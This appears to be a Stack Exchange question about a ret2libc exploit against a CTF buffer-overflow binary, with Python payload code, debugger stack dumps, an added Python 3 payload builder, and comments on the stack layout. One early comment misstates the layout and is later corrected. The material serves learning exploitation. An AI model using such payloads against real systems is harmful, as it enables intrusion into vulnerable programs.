
I ran into this binary at a CTF: https://github.com/auehc/AUCTF-2020/tree/master/Pwn/House%20of%20Madness

I first tried to exploit it and get a shell using the ret2libc technique, but I didn't succeed. I know it is not the intended way to solve the challenge, but now that the CTF is over I am focusing on achieving ret2libc on this binary, and I am stuck and need help :)

The source is in challenge.c, and the compiled version is challenge.

ASLR is disabled for the challenge, and on my computer too:

$ > cat /proc/sys/kernel/randomize_va_space
0

It is possible to trigger a buffer overflow using this input:

"2\n4\n3\nStephen\n"

plus some padding.

I wrote an exploit to try to pop a shell (without success):

#!/usr/bin/env python2

import struct

valid_input = "2\n4\n3\nStephen\n"      # menu choices that reach the overflowing read
pad = "aaaaaaaa2Aa3Aa4Aa5Aa6Aa7aaaa"    # 28 bytes of padding up to the saved return address
binsh = struct.pack("<I", 0xf7f4caaa)   # address of "/bin/sh" in libc (little-endian dword)
system = struct.pack("<I", 0xf7e0c9e0)  # address of system in libc
exit = struct.pack("<I", 0xf7dffa60)    # address of exit in libc, used as system's return address

# ret2libc frame: saved EIP -> system, then system's return address, then its first argument
exploit = valid_input \
        + pad \
        + system \
        + exit \
        + binsh
print exploit

Now, I will tell you why I don't understand why it's not working.

When I break on the ret in the function where I triggered the buffer overflow, the stack looks like this:

[0x56556684]> pxw 16 @esp
0xffffd23c  0xf7e0c9e0 0xf7dffa60 0xf7f4caaa 0xffffd200  ....`...........

So, you can see that first there is 0xf7e0c9e0, then 0xf7dffa60, then 0xf7f4caaa.

0xf7e0c9e0 is the address of system in the libc:

[0x56556684]> dmi libc system
257   0x0012a2c0 0xf7ef82c0 GLOBAL FUNC   102       svcerr_systemerr
658   0x0003e9e0 0xf7e0c9e0 GLOBAL FUNC   55        __libc_system
1525  0x0003e9e0 0xf7e0c9e0 WEAK   FUNC   55        system

0xf7dffa60 is the address of exit, although it shouldn't be needed if I popped the shell.

0xf7f4caaa is the address of the string /bin/sh\x00 in the libc:

[0x56556684]> px10@0xf7f4caaa
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0xf7f4caaa  2f62 696e 2f73 6800 6578                 /bin/sh.ex

I am stuck there, and can't figure out what is happening. If anyone can point me in the right direction, I would be very happy :)
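As an added example (not the asker's code or anything from the challenge repository), here is a Python 3 version of the same payload builder that also reconstructs the three dwords the `ret` instruction will see, so the frame layout can be checked against the debugger's `pxw` output before the payload is sent. The addresses and padding are the ones quoted in the question; `frame_at_ret`, `describe_frame` and `frame_problems` are helper names chosen here.

```python
import struct
import sys

# Values taken from the question (ASLR disabled, so the libc addresses are fixed).
VALID_INPUT = b"2\n4\n3\nStephen\n"           # menu choices that reach the overflowing read
PAD = b"aaaaaaaa2Aa3Aa4Aa5Aa6Aa7aaaa"           # 28 bytes up to the saved return address
SYSTEM = 0xf7e0c9e0                            # system in libc
EXIT = 0xf7dffa60                              # exit in libc
BINSH = 0xf7f4caaa                             # "/bin/sh\0" in libc


def p32(value):
    """Pack a dword little-endian, which is how the x86 stack stores it."""
    return struct.pack("<I", value)


def build_payload(target=SYSTEM, ret_after=EXIT, arg0=BINSH):
    """32-bit ret2libc frame: [saved EIP -> target][return address for target][first argument]."""
    return VALID_INPUT + PAD + p32(target) + p32(ret_after) + p32(arg0)


def frame_at_ret(payload, prefix_len=len(VALID_INPUT) + len(PAD)):
    """Model the stack when `ret` executes: the dword in the saved-EIP slot and the two below it.

    Returns (target, ret_after, arg0); compare them with `pxw 12 @esp` in the debugger.
    """
    frame = payload[prefix_len:prefix_len + 12]
    if len(frame) != 12:
        raise ValueError("payload does not fill the 3-dword frame")
    return struct.unpack("<III", frame)


def describe_frame(payload):
    """Render the frame the way the debugger shows it, one 0x-prefixed dword per slot."""
    return " ".join("0x%08x" % word for word in frame_at_ret(payload))


def frame_problems(payload):
    """Layout sanity checks; returns the findings (empty when the frame has the expected shape)."""
    target, ret_after, arg0 = frame_at_ret(payload)
    problems = []
    if target != SYSTEM:
        problems.append("saved EIP slot does not point at system")
    if arg0 != BINSH:
        problems.append("first-argument slot does not point at /bin/sh")
    if ret_after == BINSH:
        problems.append("return-address slot holds the string pointer: argument and return address are swapped")
    return problems


if __name__ == "__main__":
    # Write raw bytes with no trailing newline, unlike Python 2's print.
    sys.stdout.buffer.write(build_payload())
```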

  • Why do you need the exit address if you're not using it? When the ret instruction is executed, the system address is popped off the stack and the next 4 bytes are considered the first argument of the function, which in this case is the exit address. Try replacing it with the /bin/sh address; it should work. Commented Apr 11, 2020 at 10:34
  • @stylo Actually, the next 4 bytes are for the next return address after system, so exit will be called after system. What is happening when you try your payload? Commented Apr 29, 2020 at 17:23
  • Also see security.stackexchange.com/q/155844, could be your problem if addresses are correct. Commented Apr 29, 2020 at 17:25
